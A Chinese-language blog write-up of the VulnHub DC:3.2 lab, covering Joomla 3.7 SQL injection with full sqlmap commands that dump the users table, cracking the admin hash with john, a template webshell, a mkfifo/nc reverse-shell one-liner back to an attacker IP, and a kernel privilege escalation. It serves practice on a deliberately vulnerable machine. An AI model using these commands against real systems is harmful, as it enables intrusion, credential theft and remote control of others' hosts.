vulnhub-DC:3.2渗透笔记

信息搜集

IP探测

image-20240719222612552

端口探测

image-20240719222808591

发现只有80端口开启,那就直接看看web服务

网页信息搜集

image-20240719222934704

这里最重要的信息就是这个cms模板是joomla

扫一下目录:

image-20240719223357055

可以发现/administrator/是后台:

image-20240719224120841

在README.txt中记录了版本号为3.7

image-20240719223918908

查一下有没有漏洞:

image-20240719224330088

ok存在sql注入,准备利用

漏洞利用

SQL注入

方法一:sqlmap

看看漏洞细节描述:

image-20240719225234632

还是个CVE,这里连sqlmap的命令都给出来了,直接跑一手sqlmap

image-20240719231457682

跑出来5个数据库,再按常规流程梭一下:

  • 爆当前库名:

    sqlmap -u "http://192.168.40.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --current-db
    

    image-20240719231658067

    库名为joomladb

  • 爆表名:

    sqlmap -u "http://192.168.111.191/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables
    

    image-20240719232001836

    一共76张表,#__users 这个表一看就很有用,看看

  • 爆列名:

    sqlmap -u "http://192.168.111.191/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns
    

    image-20240719233206369

  • 接下来爆username和password字段:

    sqlmap -u "http://192.168.111.191/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns -C "username,password" --dump
    

    image-20240719234259313

    拿到了admin的密码哈希

方法二:漏洞库脚本

当然,我们在搜索漏洞的时候看见还有个php脚本,试试能不能梭哈:

把这个php文件cp到web目录然后解析:

image-20240720011044111

访问网页,填好目标url即可一把梭:

image-20240720011805962

密码哈希破解

用john来破解一手,把哈希写进adminpass然后用rockyou字典爆破:

john adminpass --wordlist=/usr/share/wordlists/rockyou.txt

image-20240720001631900

得到明文密码snoopy,可以进入后台看看了

后台getshell

在后台肯定是找能够编辑php文件的地方了,而这里的模板里可以新建php文件:

image-20240720002543813

我们写一个webshell代码进去,这里我在beez3里面试了很久,新建文件和写入现有文件没有连上,最后将webshell写在protostar的index.php里连上了:

image-20240720012828236

蚁剑连接:

image-20240720013026081

接下来反弹shell:

image-20240720014128065

由于这里nc没有e选项,所以我换了个命令:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.111.132 4444 >/tmp/f

image-20240720014243245

成功上线kali,接下来进入提权阶段

权限提升

看看系统内核:

uname -a

查看Ubantu发行版本

lsb_release -a

image-20240720020207491

可知系统是ubuntu 16.04

搜一下看看有没有洞:

image-20240720020509033

ok有权限提升,看看描述:

image-20240720021209388

这里给出了利用脚本的下载地址(proof of concept)

在靶机上下载:

image-20240720021311824

接下来解压并进入该目录:

image-20240720021411699

解压exp并进入目录:

image-20240720021649930

接下来按照漏洞描述文本中给出的命令进行执行,描述如下:

image-20240720021831945

直接照着打一遍:

image-20240720022129350

成功提权到root,太丑了拿个pty先:

image-20240720022510736

接下来在/root中拿flag:

image-20240720022541750

总结

这次渗透过程,有如下漏洞或利用:

  • 该joomla版本存在sql注入历史漏洞
  • 获得admin的密码哈希后,使用john进行爆破获取了明文密码
  • joomla后台存在模板编辑,可以在模板文件中写入webshell上线
  • 该主机得操作系统ubuntu 16.04存在内核漏洞,导致权限提升
posted @ 2024-07-20 02:32  Yuy0ung  阅读(12)  评论(0编辑  收藏  举报